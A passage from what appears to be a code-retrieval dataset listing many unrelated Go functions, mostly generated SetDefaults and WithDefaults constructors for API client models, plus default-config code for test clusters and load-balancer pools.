{\n\tthis := VirtualizationBaseHostPciDeviceAllOf{}\n\tvar classId string = \"virtualization.VmwareHostGpu\"\n\tthis.ClassId = classId\n\tvar objectType string = \"virtualization.VmwareHostGpu\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *CapacityPoolGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewInventoryBaseAllOfWithDefaults() *InventoryBaseAllOf {\n\tthis := InventoryBaseAllOf{}\n\treturn &this\n}", "func (o *PcloudNetworksGetallParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewHyperflexVirtualMachineAllOf(classId string, objectType string) *HyperflexVirtualMachineAllOf {\n\tthis := HyperflexVirtualMachineAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationVmwareVirtualMachineAllOf(classId string, objectType string) *VirtualizationVmwareVirtualMachineAllOf {\n\tthis := VirtualizationVmwareVirtualMachineAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar guestState string = \"Unknown\"\n\tthis.GuestState = &guestState\n\treturn &this\n}", "func NewMacpoolPoolMemberAllOfWithDefaults() *MacpoolPoolMemberAllOf {\n\tthis := MacpoolPoolMemberAllOf{}\n\tvar classId string = \"macpool.PoolMember\"\n\tthis.ClassId = classId\n\tvar objectType string = \"macpool.PoolMember\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewUcsdBackupInfoAllOfWithDefaults() *UcsdBackupInfoAllOf {\n\tthis := UcsdBackupInfoAllOf{}\n\tvar classId string = \"ucsd.BackupInfo\"\n\tthis.ClassId = classId\n\tvar objectType string = \"ucsd.BackupInfo\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewMacpoolLeaseAllOfWithDefaults() *MacpoolLeaseAllOf {\n\tthis := MacpoolLeaseAllOf{}\n\tvar classId string = \"macpool.Lease\"\n\tthis.ClassId = classId\n\tvar objectType string = \"macpool.Lease\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageNetAppCloudTargetAllOfWithDefaults() *StorageNetAppCloudTargetAllOf {\n\tthis := StorageNetAppCloudTargetAllOf{}\n\tvar classId string = \"storage.NetAppCloudTarget\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.NetAppCloudTarget\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) WithDefaults() *PcloudCloudinstancesVolumesGetallParams {\n\to.SetDefaults()\n\treturn o\n}", "func NewVmWithDefaults() *Vm {\n\tthis := Vm{}\n\treturn &this\n}", "func (o *GetOutagesParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *GetGCParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *GetBlockGeneratorResultParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *ServiceBrokerOpenstacksHostsGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *QuerySensorUpdateKernelsDistinctParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewStorageSpaceAllOfWithDefaults() *StorageSpaceAllOf {\n\tthis := StorageSpaceAllOf{}\n\tvar classId string = \"storage.Space\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.Space\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (c *TestClusterGKE) Default() {\n\tif c.Name != \"\" { // avoid loging internal annonymous objects\n\t\tlog.Info(\"applying defaults\", \"name\", c.Name, \"namespace\", c.Namespace)\n\t}\n\n\tif c.Spec.Project == nil {\n\t\tc.Spec.Project = new(string)\n\t\t*c.Spec.Project = \"cilium-ci\"\n\t}\n\n\tif c.Spec.ConfigTemplate == nil {\n\t\tc.Spec.ConfigTemplate = new(string)\n\t\t*c.Spec.ConfigTemplate = \"basic\"\n\t}\n\n\tif c.Spec.Location == nil {\n\t\tc.Spec.Location = new(string)\n\t\t*c.Spec.Location = \"europe-west2-b\"\n\t}\n\n\tif c.Spec.Region == nil {\n\t\tc.Spec.Region = new(string)\n\t\t*c.Spec.Region = \"europe-west2\"\n\t}\n\n\tif c.Spec.JobSpec != nil {\n\t\tif c.Spec.JobSpec.Runner == nil {\n\t\t\tc.Spec.JobSpec.Runner = &TestClusterGKEJobRunnerSpec{}\n\t\t}\n\n\t\tif c.Spec.JobSpec.Runner.Image == nil {\n\t\t\tc.Spec.JobSpec.Runner.Image = new(string)\n\t\t\t*c.Spec.JobSpec.Runner.Image = \"quay.io/isovalent/gke-test-cluster-gcloud:803ff83d3786eb38ef05c95768060b0c7ae0fc4d\"\n\t\t}\n\n\t\tif c.Spec.JobSpec.Runner.InitImage == nil {\n\t\t\tc.Spec.JobSpec.Runner.InitImage = new(string)\n\t\t\t*c.Spec.JobSpec.Runner.InitImage = \"quay.io/isovalent/gke-test-cluster-initutil:854733411778d633350adfa1ae66bf11ba658a3f\"\n\t\t}\n\t}\n\n\tif c.Spec.MachineType == nil {\n\t\tc.Spec.MachineType = new(string)\n\t\t*c.Spec.MachineType = \"n1-standard-4\"\n\t}\n\n\tif c.Spec.Nodes == nil {\n\t\tc.Spec.Nodes = new(int)\n\t\t*c.Spec.Nodes = 2\n\t}\n}", "func NewStorageVdMemberEpAllOfWithDefaults() *StorageVdMemberEpAllOf {\n\tthis := StorageVdMemberEpAllOf{}\n\tvar classId string = \"storage.VdMemberEp\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.VdMemberEp\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamLdapBasePropertiesAllOfWithDefaults() *IamLdapBasePropertiesAllOf {\n\tthis := IamLdapBasePropertiesAllOf{}\n\tvar classId string = \"iam.LdapBaseProperties\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.LdapBaseProperties\"\n\tthis.ObjectType = objectType\n\tvar bindMethod string = \"LoginCredentials\"\n\tthis.BindMethod = &bindMethod\n\tvar nestedGroupSearchDepth int64 = 128\n\tthis.NestedGroupSearchDepth = &nestedGroupSearchDepth\n\tvar timeout int64 = 0\n\tthis.Timeout = &timeout\n\treturn &this\n}", "func NewStoragePhysicalDiskAllOfWithDefaults() *StoragePhysicalDiskAllOf {\n\tthis := StoragePhysicalDiskAllOf{}\n\tvar classId string = \"storage.PhysicalDisk\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.PhysicalDisk\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewSoftwarerepositoryLocalMachineAllOfWithDefaults() *SoftwarerepositoryLocalMachineAllOf {\n\tthis := SoftwarerepositoryLocalMachineAllOf{}\n\tvar classId string = \"softwarerepository.LocalMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"softwarerepository.LocalMachine\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageHitachiPortAllOfWithDefaults() *StorageHitachiPortAllOf {\n\tthis := StorageHitachiPortAllOf{}\n\tvar classId string = \"storage.HitachiPort\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.HitachiPort\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewEquipmentIdentityAllOfWithDefaults() *EquipmentIdentityAllOf {\n\tthis := EquipmentIdentityAllOf{}\n\tvar adminAction string = \"None\"\n\tthis.AdminAction = &adminAction\n\treturn &this\n}", "func (o *ListMachineDeploymentNodesParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewMetricsAllOfWithDefaults() *MetricsAllOf {\n\tthis := MetricsAllOf{}\n\treturn &this\n}", "func setPropertiesDefaults(vm *api.APIModel) {\n\tif len(vm.Properties.VMProfile.Name) == 0 {\n\t\tlog.Warnf(\"Missing VM Name. Setting to %s\", vm.VMConfigurator.DefaultVMName())\n\t\tvm.Properties.VMProfile.Name = vm.VMConfigurator.DefaultVMName()\n\t}\n\t// set network defaults\n\tif vm.Properties.VnetProfile == nil {\n\t\tvm.Properties.VnetProfile = &api.VnetProfile{}\n\t}\n\tif !vm.Properties.VnetProfile.IsCustomVNET() {\n\t\tif len(vm.Properties.VnetProfile.VnetAddress) == 0 {\n\t\t\tvm.Properties.VnetProfile.VnetAddress = api.DefaultVnet\n\t\t}\n\t\tif len(vm.Properties.VnetProfile.SubnetAddress) == 0 {\n\t\t\tvm.Properties.VnetProfile.SubnetAddress = api.DefaultSubnet\n\t\t}\n\t}\n\tif len(vm.Properties.VMProfile.OSDiskType) == 0 {\n\t\tvm.Properties.VMProfile.OSDiskType = vm.VMConfigurator.DefaultOsDiskType()\n\t}\n\tif(vm.Properties.VMProfile.SecurityProfile == nil) {\n\t\tvm.Properties.VMProfile.SecurityProfile = &api.SecurityProfile{ \"true\",\"true\"}\n\t}\telse {\n\t\t\tif len(vm.Properties.VMProfile.SecurityProfile.SecureBoot) == 0 {\n\t\t\t\tvm.Properties.VMProfile.SecurityProfile.SecureBoot = \"true\"\n\t\t\t}\t\n\t\t\tif len(vm.Properties.VMProfile.SecurityProfile.VTPM) == 0 {\n\t\t\t\tvm.Properties.VMProfile.SecurityProfile.VTPM = \"true\"\n\t\t\t}\n\t\t\tif (vm.Properties.VMProfile.SecurityProfile.SecureBoot == \"none\") {\n\t\t\t\tvm.Properties.VMProfile.SecurityProfile = nil\n\t\t\t} \n\t}\n}", "func getDefaults(resourceType voyager.ResourceType, location voyager.ClusterLocation) map[string]interface{} {\n\tswitch resourceType {\n\tcase voyager.ResourceType(\"DynamoDB\"):\n\t\treturn map[string]interface{}{\n\t\t\t\"BackupPeriod\": \"1 hours\",\n\t\t}\n\tcase voyager.ResourceType(\"KubeCompute\"):\n\t\tvar minReplicas int32\n\t\tswitch location.EnvType {\n\t\tcase voyager.EnvTypeProduction, voyager.EnvTypeStaging:\n\t\t\tminReplicas = defaultKubeComputeMinReplicasProd\n\t\tdefault:\n\t\t\tminReplicas = defaultKubeComputeMinReplicas\n\t\t}\n\t\treturn map[string]interface{}{\n\t\t\t\"Scaling\": map[string]interface{}{\n\t\t\t\t\"MinReplicas\": minReplicas,\n\t\t\t\t\"MaxReplicas\": defaultKubeComputeMaxReplicas,\n\t\t\t\t\"Metrics\": []map[string]interface{}{\n\t\t\t\t\t{\n\t\t\t\t\t\t\"Type\": \"Resource\",\n\t\t\t\t\t\t\"Resource\": map[string]interface{}{\n\t\t\t\t\t\t\t\"Name\": \"cpu\",\n\t\t\t\t\t\t\t\"TargetAverageUtilization\": defaultKubeComputeResourceMetricTargetUtilization,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"Container\": map[string]interface{}{\n\t\t\t\t\"ImagePullPolicy\": defaultKubeComputeImagePullPolicy,\n\t\t\t\t\"LivenessProbe\": map[string]interface{}{\n\t\t\t\t\t\"TimeoutSeconds\": defaultKubeComputeProbeTimeoutSeconds,\n\t\t\t\t\t\"PeriodSeconds\": defaultKubeComputeProbePeriodSeconds,\n\t\t\t\t\t\"SuccessThreshold\": defaultKubeComputeProbeSuccessThreshold,\n\t\t\t\t\t\"FailureThreshold\": defaultKubeComputeProbeFailureThreshold,\n\t\t\t\t\t\"HTTPGet\": map[string]interface{}{\n\t\t\t\t\t\t\"Path\": defaultKubeComputeHTTPGetPath,\n\t\t\t\t\t\t\"Scheme\": defaultKubeComputeHTTPGetScheme,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"ReadinessProbe\": map[string]interface{}{\n\t\t\t\t\t\"TimeoutSeconds\": defaultKubeComputeProbeTimeoutSeconds,\n\t\t\t\t\t\"PeriodSeconds\": defaultKubeComputeProbePeriodSeconds,\n\t\t\t\t\t\"SuccessThreshold\": defaultKubeComputeProbeSuccessThreshold,\n\t\t\t\t\t\"FailureThreshold\": defaultKubeComputeProbeFailureThreshold,\n\t\t\t\t\t\"HTTPGet\": map[string]interface{}{\n\t\t\t\t\t\t\"Path\": defaultKubeComputeHTTPGetPath,\n\t\t\t\t\t\t\"Scheme\": defaultKubeComputeHTTPGetScheme,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"Resources\": map[string]interface{}{\n\t\t\t\t\t\"Requests\": map[string]interface{}{\n\t\t\t\t\t\t\"cpu\": defaultKubeComputeResourceRequestCPU,\n\t\t\t\t\t\t\"memory\": defaultKubeComputeResourceRequestMemory,\n\t\t\t\t\t},\n\t\t\t\t\t\"Limits\": map[string]interface{}{\n\t\t\t\t\t\t\"cpu\": defaultKubeComputeResourceLimitCPU,\n\t\t\t\t\t\t\"memory\": defaultKubeComputeResourceLimitMemory,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"Port\": map[string]interface{}{\n\t\t\t\t\"Protocol\": defaultKubeComputeProtocol,\n\t\t\t},\n\t\t}\n\tcase voyager.ResourceType(\"KubeIngress\"):\n\t\treturn map[string]interface{}{\n\t\t\t\"timeoutSeconds\": 60,\n\t\t}\n\tdefault:\n\t\treturn map[string]interface{}{}\n\t}\n\n}", "func (o *GetBackupLocationsParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewMemoryArrayAllOfWithDefaults() *MemoryArrayAllOf {\n\tthis := MemoryArrayAllOf{}\n\tvar classId string = \"memory.Array\"\n\tthis.ClassId = classId\n\tvar objectType string = \"memory.Array\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *GetGPUArchitectureParams) SetDefaults() {\n\tvar (\n\t\tallowUnstableDefault = bool(false)\n\t)\n\n\tval := GetGPUArchitectureParams{\n\t\tAllowUnstable: &allowUnstableDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func NewPipelineSshKeyPairAllOfWithDefaults() *PipelineSshKeyPairAllOf {\n\tthis := PipelineSshKeyPairAllOf{}\n\treturn &this\n}", "func NewDefault() *Config {\n\tname := fmt.Sprintf(\"ec2-%s-%s\", getTS()[:10], randutil.String(12))\n\tif v := os.Getenv(AWS_K8S_TESTER_EC2_PREFIX + \"NAME\"); v != \"\" {\n\t\tname = v\n\t}\n\treturn &Config{\n\t\tmu: new(sync.RWMutex),\n\n\t\tUp: false,\n\t\tDeletedResources: make(map[string]string),\n\n\t\tName: name,\n\t\tPartition: endpoints.AwsPartitionID,\n\t\tRegion: endpoints.UsWest2RegionID,\n\n\t\t// to be auto-generated\n\t\tConfigPath: \"\",\n\t\tRemoteAccessCommandsOutputPath: \"\",\n\n\t\tLogColor: true,\n\t\tLogColorOverride: \"\",\n\n\t\tLogLevel: logutil.DefaultLogLevel,\n\t\t// default, stderr, stdout, or file name\n\t\t// log file named with cluster name will be added automatically\n\t\tLogOutputs: []string{\"stderr\"},\n\n\t\tOnFailureDelete: true,\n\t\tOnFailureDeleteWaitSeconds: 120,\n\n\t\tS3: getDefaultS3(),\n\t\tRole: getDefaultRole(),\n\t\tVPC: getDefaultVPC(),\n\t\tRemoteAccessKeyCreate: true,\n\t\tRemoteAccessPrivateKeyPath: filepath.Join(os.TempDir(), randutil.String(10)+\".insecure.key\"),\n\n\t\tASGsFetchLogs: true,\n\t\tASGs: map[string]ASG{\n\t\t\tname + \"-asg\": {\n\t\t\t\tName: name + \"-asg\",\n\t\t\t\tSSM: &SSM{\n\t\t\t\t\tDocumentCreate: false,\n\t\t\t\t\tDocumentName: \"\",\n\t\t\t\t\tDocumentCommands: \"\",\n\t\t\t\t\tDocumentExecutionTimeoutSeconds: 3600,\n\t\t\t\t},\n\t\t\t\tRemoteAccessUserName: \"ec2-user\", // for AL2\n\t\t\t\tAMIType: AMITypeAL2X8664,\n\t\t\t\tImageID: \"\",\n\t\t\t\tImageIDSSMParameter: \"/aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2\",\n\t\t\t\tInstanceType: DefaultNodeInstanceTypeCPU,\n\t\t\t\tVolumeSize: DefaultNodeVolumeSize,\n\t\t\t\tASGMinSize: 1,\n\t\t\t\tASGMaxSize: 1,\n\t\t\t\tASGDesiredCapacity: 1,\n\t\t\t},\n\t\t},\n\t}\n}", "func NewOsInstallAllOfWithDefaults() *OsInstallAllOf {\n\tthis := OsInstallAllOf{}\n\tvar classId string = \"os.Install\"\n\tthis.ClassId = classId\n\tvar objectType string = \"os.Install\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewNiatelemetryEqptcapacityPolUsage5minAllOfWithDefaults() *NiatelemetryEqptcapacityPolUsage5minAllOf {\n\tthis := NiatelemetryEqptcapacityPolUsage5minAllOf{}\n\tvar classId string = \"niatelemetry.EqptcapacityPolUsage5min\"\n\tthis.ClassId = classId\n\tvar objectType string = \"niatelemetry.EqptcapacityPolUsage5min\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewCloudInstanceTypeAllOf(classId string, objectType string) *CloudInstanceTypeAllOf {\n\tthis := CloudInstanceTypeAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *GetCurrentGenerationParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *ServiceInstanceGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewDefault() *instance {\n\treturn New(\n\t\t[]factory.Contract{\n\t\t\texampleMetadataFactory.New(),\n\t\t\tiotaMetadataFactory.New(),\n\t\t\tipfsMetadataFactory.New(),\n\t\t},\n\t)\n}", "func (o *ApplicationComponentSnapshotCollectionGetParams) SetDefaults() {\n\tvar (\n\t\treturnRecordsDefault = bool(true)\n\n\t\treturnTimeoutDefault = int64(15)\n\t)\n\n\tval := ApplicationComponentSnapshotCollectionGetParams{\n\t\tReturnRecords: &returnRecordsDefault,\n\t\tReturnTimeout: &returnTimeoutDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func (o *TestEndpointParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *StorageServiceOwnershipGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *BulkStartCPUGeneratorsParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *CreateIscsiLunSnapshotParams) SetDefaults() {\n\tvar (\n\t\tcontentLanguageDefault = string(\"en-US\")\n\t)\n\n\tval := CreateIscsiLunSnapshotParams{\n\t\tContentLanguage: &contentLanguageDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func (o *SetUniverseBackupFlagParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *BucketsCollectionGetParams) SetDefaults() {\n\tvar (\n\t\treturnRecordsDefault = bool(true)\n\n\t\treturnTimeoutDefault = int64(15)\n\t)\n\n\tval := BucketsCollectionGetParams{\n\t\tReturnRecords: &returnRecordsDefault,\n\t\tReturnTimeout: &returnTimeoutDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func NewTimedZoneRangeAllOfWithDefaults() *TimedZoneRangeAllOf {\n\tthis := TimedZoneRangeAllOf{}\n\treturn &this\n}", "func (o *MetroclusterInterconnectGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (bc *BouncerCreate) defaults() {\n\tif _, ok := bc.mutation.CreatedAt(); !ok {\n\t\tv := bouncer.DefaultCreatedAt()\n\t\tbc.mutation.SetCreatedAt(v)\n\t}\n\tif _, ok := bc.mutation.UpdatedAt(); !ok {\n\t\tv := bouncer.DefaultUpdatedAt()\n\t\tbc.mutation.SetUpdatedAt(v)\n\t}\n\tif _, ok := bc.mutation.IPAddress(); !ok {\n\t\tv := bouncer.DefaultIPAddress\n\t\tbc.mutation.SetIPAddress(v)\n\t}\n\tif _, ok := bc.mutation.Until(); !ok {\n\t\tv := bouncer.DefaultUntil()\n\t\tbc.mutation.SetUntil(v)\n\t}\n\tif _, ok := bc.mutation.LastPull(); !ok {\n\t\tv := bouncer.DefaultLastPull()\n\t\tbc.mutation.SetLastPull(v)\n\t}\n\tif _, ok := bc.mutation.AuthType(); !ok {\n\t\tv := bouncer.DefaultAuthType\n\t\tbc.mutation.SetAuthType(v)\n\t}\n}", "func (o *AddOrUpdateNodePoolConfigItemParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *EstimateCoinSellAllParams) SetDefaults() {\n\tvar (\n\t\tgasPriceDefault = uint64(1)\n\n\t\tswapFromDefault = string(\"optimal\")\n\t)\n\n\tval := EstimateCoinSellAllParams{\n\t\tGasPrice: &gasPriceDefault,\n\t\tSwapFrom: &swapFromDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func NewJsonWireguardInterfaceAllOfWithDefaults() *JsonWireguardInterfaceAllOf {\n\tthis := JsonWireguardInterfaceAllOf{}\n\treturn &this\n}", "func (o *GetRackTopoesParams) SetDefaults() {\n\tvar (\n\t\tcontentLanguageDefault = string(\"en-US\")\n\t)\n\n\tval := GetRackTopoesParams{\n\t\tContentLanguage: &contentLanguageDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func (o *VectorThumbnailParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewInfraBasePciConfigurationAllOfWithDefaults() *InfraBasePciConfigurationAllOf {\n\tthis := InfraBasePciConfigurationAllOf{}\n\treturn &this\n}", "func (o *PetCreateParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *GetPropertyDescriptorParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewProdutoVMWithDefaults() *ProdutoVM {\n\tthis := ProdutoVM{}\n\treturn &this\n}", "func (o *PcloudSapGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *ListSSHKeysParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *RegenerateDeployKeyParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *BaseEdgeLBPoolSpec) setDefaults() {\n\t// Set defaults for for pure dklb functionality.\n\tif o.CloudProviderConfiguration == nil {\n\t\to.CloudProviderConfiguration = pointers.NewString(\"\")\n\t}\n\tif o.CPUs == nil {\n\t\to.CPUs = &DefaultEdgeLBPoolCpus\n\t}\n\tif o.Memory == nil {\n\t\to.Memory = &DefaultEdgeLBPoolMemory\n\t}\n\tif o.Name == nil {\n\t\to.Name = pointers.NewString(newRandomEdgeLBPoolName(\"\"))\n\t}\n\tif o.Role == nil {\n\t\to.Role = pointers.NewString(DefaultEdgeLBPoolRole)\n\t}\n\tif o.Network == nil && *o.Role == constants.EdgeLBRolePublic {\n\t\to.Network = pointers.NewString(constants.EdgeLBHostNetwork)\n\t}\n\tif o.Network == nil && *o.Role != constants.EdgeLBRolePublic {\n\t\to.Network = pointers.NewString(constants.DefaultDCOSVirtualNetworkName)\n\t}\n\tif o.Size == nil {\n\t\to.Size = pointers.NewInt32(int32(DefaultEdgeLBPoolSize))\n\t}\n\tif o.Strategies == nil {\n\t\to.Strategies = &EdgeLBPoolManagementStrategies{\n\t\t\tCreation: &DefaultEdgeLBPoolCreationStrategy,\n\t\t}\n\t}\n\t// Check whether cloud-provider configuration is being specified, and override the defaults where necessary.\n\tif *o.CloudProviderConfiguration != \"\" {\n\t\t// If the target EdgeLB pool's name doesn't start with the prefix used for cloud-provider pools, we generate a new name using that prefix.\n\t\tif !strings.HasPrefix(*o.Name, constants.EdgeLBCloudProviderPoolNamePrefix) {\n\t\t\to.Name = pointers.NewString(newRandomEdgeLBPoolName(constants.EdgeLBCloudProviderPoolNamePrefix))\n\t\t}\n\t\t// If the target EdgeLB pool's network is not the host network, we override it.\n\t\tif *o.Network != constants.EdgeLBHostNetwork {\n\t\t\to.Network = pointers.NewString(constants.EdgeLBHostNetwork)\n\t\t}\n\t}\n}", "func defaultOptions() interface{} {\n\to := &options{}\n\n\ttype param struct {\n\t\tdefval string\n\t\tparsefn func(string) error\n\t}\n\n\tparams := map[string]param{\n\t\t\"JAEGER_COLLECTOR\": {\n\t\t\tdefaultJaegerCollector,\n\t\t\tfunc(v string) error { o.JaegerCollector = v; return nil },\n\t\t},\n\t\t\"JAEGER_AGENT\": {\n\t\t\tdefaultJaegerAgent,\n\t\t\tfunc(v string) error { o.JaegerAgent = v; return nil },\n\t\t},\n\t\t\"HTTP_ENDPOINT\": {\n\t\t\tdefaultHTTPEndpoint,\n\t\t\tfunc(v string) error { o.HTTPEndpoint = v; return nil },\n\t\t},\n\t\t\"PROMETHEUS_EXPORT\": {\n\t\t\tdefaultPrometheusExport,\n\t\t\tfunc(v string) error {\n\t\t\t\tenabled, err := utils.ParseEnabled(v)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\to.PrometheusExport = enabled\n\t\t\t\treturn nil\n\t\t\t},\n\t\t},\n\t\t\"SAMPLING_FREQUENCY\": {\n\t\t\tdefaultSampling,\n\t\t\tfunc(v string) error { return o.Sampling.Parse(v) },\n\t\t},\n\t\t\"REPORT_PERIOD\": {\n\t\t\tdefaultReportPeriod,\n\t\t\tfunc(v string) error {\n\t\t\t\td, err := time.ParseDuration(v)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\to.ReportPeriod = d\n\t\t\t\treturn nil\n\t\t\t},\n\t\t},\n\t}\n\n\tfor envvar, p := range params {\n\t\tparseEnv(envvar, p.defval, p.parsefn)\n\t}\n\n\treturn o\n}", "func NewIamLdapProviderAllOfWithDefaults() *IamLdapProviderAllOf {\n\tthis := IamLdapProviderAllOf{}\n\tvar classId string = \"iam.LdapProvider\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.LdapProvider\"\n\tthis.ObjectType = objectType\n\tvar port int64 = 389\n\tthis.Port = &port\n\treturn &this\n}", "func (o *ConfigurationBackupGetParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewDefaultOptions() Options {\n\treturn Options{\n\t\tFilesInCollection: 10,\n\t\tGasPrice: \"\",\n\t\tMaxPathnameLength: 64,\n\t\tPostageAmount: 1,\n\t\tPostageDepth: 16,\n\t\tPostageLabel: \"test-label\",\n\t\tPostageWait: 5 * time.Second,\n\t\tSeed: 0,\n\t}\n}", "func (o *PcloudIkepoliciesPutParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewDeviceMetricsAllOfWithDefaults() *DeviceMetricsAllOf {\n\tthis := DeviceMetricsAllOf{}\n\treturn &this\n}", "func (o *BatchUpsertCatalogObjectsParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (o *PostHostStorageSectorsDeleteMerklerootParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewConnectorTypeAllOfWithDefaults() *ConnectorTypeAllOf {\n\tthis := ConnectorTypeAllOf{}\n\n\n\n\n\n\n\n\n\treturn &this\n}", "func NewPrinterDefaults()(*PrinterDefaults) {\n m := &PrinterDefaults{\n }\n m.backingStore = ie8677ce2c7e1b4c22e9c3827ecd078d41185424dd9eeb92b7d971ed2d49a392e.BackingStoreFactoryInstance();\n m.SetAdditionalData(make(map[string]any))\n return m\n}", "func (o *GetBundleByKeyParams) SetDefaults() {\n\tvar (\n\t\tauditDefault = string(\"NONE\")\n\n\t\tincludedDeletedDefault = bool(false)\n\t)\n\n\tval := GetBundleByKeyParams{\n\t\tAudit: &auditDefault,\n\t\tIncludedDeleted: &includedDeletedDefault,\n\t}\n\n\tval.timeout = o.timeout\n\tval.Context = o.Context\n\tval.HTTPClient = o.HTTPClient\n\t*o = val\n}", "func (o *PcloudV1CloudinstancesCosimagesPostParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewFcNeighborAllOfWithDefaults() *FcNeighborAllOf {\n\tthis := FcNeighborAllOf{}\n\tvar classId string = \"fc.Neighbor\"\n\tthis.ClassId = classId\n\tvar objectType string = \"fc.Neighbor\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStackpathRpcLocalizedMessageAllOfWithDefaults() *StackpathRpcLocalizedMessageAllOf {\n\tthis := StackpathRpcLocalizedMessageAllOf{}\n\treturn &this\n}", "func NewConnectorXmlApiMessageAllOfWithDefaults() *ConnectorXmlApiMessageAllOf {\n\tthis := ConnectorXmlApiMessageAllOf{}\n\tvar classId string = \"connector.XmlApiMessage\"\n\tthis.ClassId = classId\n\tvar objectType string = \"connector.XmlApiMessage\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *GetIngredientVersionRevisionParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func (cc *ConstructionCreate) defaults() {\n\tif _, ok := cc.mutation.RawProduction(); !ok {\n\t\tv := construction.DefaultRawProduction\n\t\tcc.mutation.SetRawProduction(v)\n\t}\n\tif _, ok := cc.mutation.Production(); !ok {\n\t\tv := construction.DefaultProduction\n\t\tcc.mutation.SetProduction(v)\n\t}\n\tif _, ok := cc.mutation.GetType(); !ok {\n\t\tv := construction.DefaultType\n\t\tcc.mutation.SetType(v)\n\t}\n\tif _, ok := cc.mutation.Level(); !ok {\n\t\tv := construction.DefaultLevel\n\t\tcc.mutation.SetLevel(v)\n\t}\n\tif _, ok := cc.mutation.Modifier(); !ok {\n\t\tv := construction.DefaultModifier\n\t\tcc.mutation.SetModifier(v)\n\t}\n\tif _, ok := cc.mutation.LastUpdated(); !ok {\n\t\tv := construction.DefaultLastUpdated()\n\t\tcc.mutation.SetLastUpdated(v)\n\t}\n\tif _, ok := cc.mutation.NeedRefresh(); !ok {\n\t\tv := construction.DefaultNeedRefresh\n\t\tcc.mutation.SetNeedRefresh(v)\n\t}\n}", "func DefaultParams() *Params {\n\tp := 